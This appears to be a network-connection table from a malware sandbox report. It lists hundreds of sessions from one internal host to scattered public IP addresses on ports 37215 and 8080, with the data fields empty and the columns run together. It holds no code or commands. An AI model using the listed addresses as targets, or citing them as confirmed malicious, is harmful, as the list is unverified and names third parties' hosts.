                                                        34625192.168.2.2345224180.38.61.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34626192.168.2.2338736157.30.13.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34627192.168.2.235544241.61.253.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34628192.168.2.2332800197.180.33.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34629192.168.2.234417041.230.144.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34630192.168.2.235617874.199.161.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34631192.168.2.2343488157.101.189.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34632192.168.2.235280441.100.50.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34633192.168.2.2344506197.206.112.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34634192.168.2.233575841.161.65.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34635192.168.2.2344910197.243.15.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34636192.168.2.233983841.76.188.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34637192.168.2.2335870157.155.139.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34638192.168.2.2347082197.135.27.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34639192.168.2.2349060105.206.111.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34640192.168.2.2354046197.17.139.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34641192.168.2.233660241.152.106.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34642192.168.2.2358176197.224.145.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34643192.168.2.2352000197.224.18.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34644192.168.2.2348660157.95.98.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34645192.168.2.2333686197.45.96.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34646192.168.2.235184857.231.143.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34647192.168.2.235727024.140.141.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34648192.168.2.234815041.78.218.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34649192.168.2.2348930197.120.184.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34650192.168.2.234954467.2.7.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34651192.168.2.2339580197.66.205.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34652192.168.2.2340422197.114.226.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34653192.168.2.236039841.192.71.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34654192.168.2.2337388197.140.238.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34655192.168.2.2338474129.31.245.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34656192.168.2.2358222213.198.224.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34657192.168.2.2352020197.148.3.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34658192.168.2.2338398197.80.62.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34659192.168.2.2340780157.76.55.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34660192.168.2.2343854216.188.4.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34661192.168.2.234752041.174.24.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34662192.168.2.2359942157.129.192.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34663192.168.2.2345108157.183.246.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34664192.168.2.2346268197.149.23.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34665192.168.2.2358834200.156.231.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34666192.168.2.2348526197.80.164.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34667192.168.2.2334044157.229.167.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34668192.168.2.2336502197.110.186.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34669192.168.2.2337300163.30.231.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34670192.168.2.233366649.77.1.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34671192.168.2.2343898171.155.175.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34672192.168.2.2341924119.47.213.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34673192.168.2.2351894178.44.217.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34674192.168.2.2334226208.93.193.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34675192.168.2.2353868186.28.31.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34676192.168.2.236060071.107.91.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34677192.168.2.2343726187.238.224.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34678192.168.2.2341180182.203.2.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34679192.168.2.2336054198.17.215.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34680192.168.2.235292861.224.49.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34681192.168.2.2340378212.15.69.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34682192.168.2.2339108151.104.44.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34683192.168.2.23532384.194.118.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34684192.168.2.234519066.26.93.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34685192.168.2.23490745.60.51.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34686192.168.2.235928873.106.231.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34687192.168.2.2345798166.195.9.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34688192.168.2.2341028120.63.125.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34689192.168.2.234155438.231.170.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34690192.168.2.234096464.86.115.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34691192.168.2.2359078161.104.191.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34692192.168.2.2355102219.83.174.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34693192.168.2.234432873.126.17.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34694192.168.2.234208039.8.213.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34695192.168.2.2357408180.190.111.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34696192.168.2.233298299.121.109.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34697192.168.2.233594661.111.65.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34698192.168.2.2351544128.132.33.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34699192.168.2.235345295.234.34.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34700192.168.2.2339552207.196.179.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34701192.168.2.2355716209.121.201.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34702192.168.2.234550639.144.234.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34703192.168.2.2358946134.197.234.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34704192.168.2.2339900143.151.228.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34705192.168.2.235663075.219.193.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34706192.168.2.2341812186.103.75.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34707192.168.2.233885852.218.28.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34708192.168.2.2359732216.77.137.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34709192.168.2.2360990101.222.12.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34710192.168.2.2339402103.48.183.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34711192.168.2.2345802136.36.172.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34712192.168.2.234411627.101.185.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34713192.168.2.235549695.85.239.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34714192.168.2.234534694.195.128.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34715192.168.2.235062086.42.235.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34716192.168.2.2340498179.220.61.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34717192.168.2.2351426176.175.221.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34718192.168.2.2356288193.243.203.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34719192.168.2.2343612107.65.139.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34720192.168.2.233995444.111.15.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34721192.168.2.2347616217.95.201.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34722192.168.2.235334099.110.185.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34723192.168.2.233934242.149.23.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34724192.168.2.235983874.195.61.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34725192.168.2.234458090.34.197.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34726192.168.2.2346376135.6.188.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34727192.168.2.2357700147.196.192.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34728192.168.2.2353756210.247.226.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34729192.168.2.235615235.64.32.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34730192.168.2.2348068174.22.181.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34731192.168.2.234504268.104.226.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34732192.168.2.2339626145.233.45.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34733192.168.2.234569050.189.231.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34734192.168.2.235544269.11.230.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34735192.168.2.235786077.43.167.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34736192.168.2.2356590105.251.36.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34737192.168.2.233325692.106.13.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34738192.168.2.2347874130.154.66.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34739192.168.2.2341860197.70.190.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34740192.168.2.2344280103.141.208.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34741192.168.2.235937640.177.4.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34742192.168.2.2340856176.91.221.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34743192.168.2.2347188163.146.167.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34744192.168.2.2354738152.102.21.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34745192.168.2.233309650.176.73.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34746192.168.2.2336054194.107.13.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34747192.168.2.2337638194.70.49.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34748192.168.2.2342894207.123.104.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34749192.168.2.233456238.121.89.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34750192.168.2.2338082141.83.49.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34751192.168.2.2357630190.39.40.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34752192.168.2.233561699.71.25.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34753192.168.2.234521631.131.63.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34754192.168.2.2337766169.71.231.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34755192.168.2.234290071.29.65.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34756192.168.2.2351208117.93.138.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34757192.168.2.235670060.186.200.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34758192.168.2.2344386155.245.11.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34759192.168.2.2353050181.1.210.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34760192.168.2.2359044170.203.63.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34761192.168.2.235148837.55.101.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34762192.168.2.234420434.223.120.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34763192.168.2.2359290198.127.53.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34764192.168.2.2337680206.238.141.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34765192.168.2.2358116207.192.4.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34766192.168.2.2353326149.130.213.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34767192.168.2.23543925.154.67.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34768192.168.2.233620817.188.73.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34769192.168.2.2334608107.124.185.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34770192.168.2.233873825.81.195.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34771192.168.2.235704634.219.121.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34772192.168.2.2348844148.121.48.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34773192.168.2.2359460219.14.248.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34774192.168.2.2343768149.208.214.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34775192.168.2.2353134189.50.114.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34776192.168.2.2346776144.215.49.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34777192.168.2.2336712161.10.178.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34778192.168.2.2333906148.187.107.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34779192.168.2.2355308108.85.83.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34780192.168.2.23462308.229.189.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34781192.168.2.2357932128.213.186.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34782192.168.2.234357071.137.102.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34783192.168.2.2355188107.122.178.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34784192.168.2.233570477.220.233.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34785192.168.2.2344520136.19.29.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34786192.168.2.2348124218.198.200.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34787192.168.2.2347896166.43.11.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34788192.168.2.2342422137.59.30.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34789192.168.2.2356556109.17.62.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34790192.168.2.235397852.156.208.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34791192.168.2.236008627.35.118.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34792192.168.2.2336800105.133.13.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34793192.168.2.234307817.53.223.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34794192.168.2.2338634174.71.242.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34795192.168.2.234793231.228.10.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34796192.168.2.235584060.92.121.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34797192.168.2.2348314103.98.173.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34798192.168.2.2351102161.42.62.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34799192.168.2.234921024.166.42.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34800192.168.2.2344404155.235.224.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34801192.168.2.2359218151.224.64.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34802192.168.2.2336300123.214.122.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34803192.168.2.2352426129.173.180.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34804192.168.2.234600637.211.163.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34805192.168.2.2344746212.38.72.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34806192.168.2.2338920165.5.45.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34807192.168.2.2346632150.217.254.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34808192.168.2.2358854167.239.8.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34809192.168.2.2358696181.43.124.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34810192.168.2.2356862145.250.180.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34811192.168.2.234416090.184.137.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34812192.168.2.2340410152.172.26.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34813192.168.2.2351044126.112.48.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34814192.168.2.2358648216.56.100.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34815192.168.2.2350560182.127.140.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34816192.168.2.2335402202.143.129.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34817192.168.2.2333952140.95.184.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34818192.168.2.234606257.74.110.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34819192.168.2.233823467.118.157.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34820192.168.2.235387299.45.64.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34821192.168.2.233712686.32.246.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34822192.168.2.23479221.113.137.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34823192.168.2.2342632196.166.230.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34824192.168.2.2344028101.124.194.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34825192.168.2.235505617.135.119.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34826192.168.2.2358660208.139.58.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34827192.168.2.234370035.205.229.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34828192.168.2.2347418159.112.197.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34829192.168.2.233800041.53.114.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34830192.168.2.234331485.162.254.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34831192.168.2.2352038137.158.32.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34832192.168.2.2345548201.236.92.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34833192.168.2.235978490.17.66.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34834192.168.2.2360878136.20.204.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
